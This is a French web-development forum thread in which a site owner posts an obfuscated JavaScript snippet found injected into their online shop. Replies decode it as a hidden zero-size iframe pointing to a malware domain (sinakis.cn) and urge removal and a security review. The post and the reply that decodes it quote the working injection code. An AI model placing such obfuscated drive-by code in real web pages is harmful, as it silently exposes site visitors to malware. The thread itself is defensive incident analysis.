IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

JavaScript Discussion :

Décoder un script JavaScript


Sujet :

JavaScript

  1. #1
    Membre averti
    Profil pro
    Inscrit en
    Juillet 2006
    Messages
    17
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juillet 2006
    Messages : 17
    Par défaut Décoder un script JavaScript
    Bonjour à tous,
    Nous nous retrouvons avec sur les pages de notre site le code suivant :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <script><script language="JavaScript"> eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C115%2C105%2C110%2C97%2C107%2C105%2C115%2C46%2C99%2C110%2C47%2C98%2C97%2C110%2C101%2C114%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B")); </script></script>
    Hors nous n'avons jamais intégré ce bout de code !!! Serions nous en train de nous faire hacker ? Quelqu'un saurait-il décoder ces lignes et nous les mettre en langage compréhensible ?

  2. #2
    Expert éminent

    Avatar de vermine
    Profil pro
    Inscrit en
    Mars 2008
    Messages
    6 582
    Détails du profil
    Informations personnelles :
    Âge : 40
    Localisation : Belgique

    Informations forums :
    Inscription : Mars 2008
    Messages : 6 582
    Par défaut
    Bonjour,

    Si on enlève la première balise <script>, il essaie de nous connecter à un site qui commence par "sinakis.cn..." (mais je n'ai pas su lire la suite) et tente d'ouvrir un document "Acr21.tmp" avec Acrobat Reader.
    A ne pas tester car ça me semble louche.

    eval permet d'évaluer et d'exécuter le code inscrit dans une chaine de caractères.

    Quant à unescape:

    Permet de décoder les chaînes codés en unicode avec escape. Les chaînes unicodes permettent de lire du texte sur tous les ordinateur. Ils sont composés de %XX ou uxxxx. Les premiers sont remplacés par les caractères et les secondes sont transformés en hexadécimaux.
    Je n'ai pas cherché à traduire les codes pour trouver la chaine que le malandrin essaie d'obtenir mais une table pourrait vous aider à déchiffrer tout cela.

  3. #3
    Rédacteur

    Avatar de Bovino
    Homme Profil pro
    Développeur Web
    Inscrit en
    Juin 2008
    Messages
    23 647
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 54
    Localisation : France, Gironde (Aquitaine)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Juin 2008
    Messages : 23 647
    Billets dans le blog
    20
    Par défaut
    Ca dit :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <iframe src="http://sinakis.cn/baner/index.php" width="0" height="0"></iframe>
    Si c'est pas toi qui a mis ça dans la page, je te conseille non seulement de le retirer mais surtout de revoir la sécurité de ton site !
    Pas de question technique par MP !
    Tout le monde peut participer à developpez.com, vous avez une idée, contactez-moi !
    Mes formations video2brain : La formation complète sur JavaScriptJavaScript et le DOM par la pratiquePHP 5 et MySQL : les fondamentaux
    Mon livre sur jQuery
    Module Firefox / Chrome d'intégration de JSFiddle et CodePen sur le forum

  4. #4
    Expert éminent

    Homme Profil pro
    Inscrit en
    Janvier 2007
    Messages
    13 474
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Isère (Rhône Alpes)

    Informations professionnelles :
    Secteur : Finance

    Informations forums :
    Inscription : Janvier 2007
    Messages : 13 474
    Par défaut
    +1

    Avec une chtite recherche sur le oueb, on trouve sinakis.cn dans les listes de malware ...

    A éliminer d'urgence !

    A+

  5. #5
    Membre éclairé Avatar de EIN-LESER
    Homme Profil pro
    Développeur Web
    Inscrit en
    Mai 2008
    Messages
    703
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 48
    Localisation : France, Marne (Champagne Ardenne)

    Informations professionnelles :
    Activité : Développeur Web
    Secteur : Service public

    Informations forums :
    Inscription : Mai 2008
    Messages : 703
    Par défaut
    Tu n'utilise pas de sécurité pour les chaines de caractères que tes user peuvent saisir sut ton site?

    en PHP htmlspecialchars est un grand classique par exemple sa doit exister en javascript aussi je pense

    ah ces hackers ils sont tous

  6. #6
    Membre averti
    Profil pro
    Inscrit en
    Juillet 2006
    Messages
    17
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juillet 2006
    Messages : 17
    Par défaut
    Merci à tous pour vos réponses.
    Je vais préciser les choses car nous avons une tierce partie qui a accès au ftp du site et nous avons un gros doute. De plus nous avons ce problème sur une boutique en ligne Thélia dans sa dernière version qui n'est pas connu pour avoir des failles, mais ne sait-on jamais… Le tout hébergé chez OVH en mutualisé.
    Pour ceux qui ont décodé en entier le message, avez-vous un lien vers le décodeur ?
    Encore merci.

Discussions similaires

  1. Comment gérer les objects déclarer en HTML dans un script JAVASCRIPT?
    Par Thauglor dans le forum Général JavaScript
    Réponses: 3
    Dernier message: 25/04/2006, 14h54
  2. Probleme avec un script javascript->php
    Par leluis dans le forum Général JavaScript
    Réponses: 5
    Dernier message: 23/03/2006, 15h32
  3. aide pour un script javascript
    Par speedylol dans le forum Général JavaScript
    Réponses: 9
    Dernier message: 22/03/2006, 14h28
  4. utiliser un recordset dans un script javascript
    Par insect INC dans le forum ASP
    Réponses: 4
    Dernier message: 10/10/2005, 19h29
  5. [PHP-JS] Php dans un script javascript
    Par nebule dans le forum Général JavaScript
    Réponses: 7
    Dernier message: 30/11/2004, 10h38

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo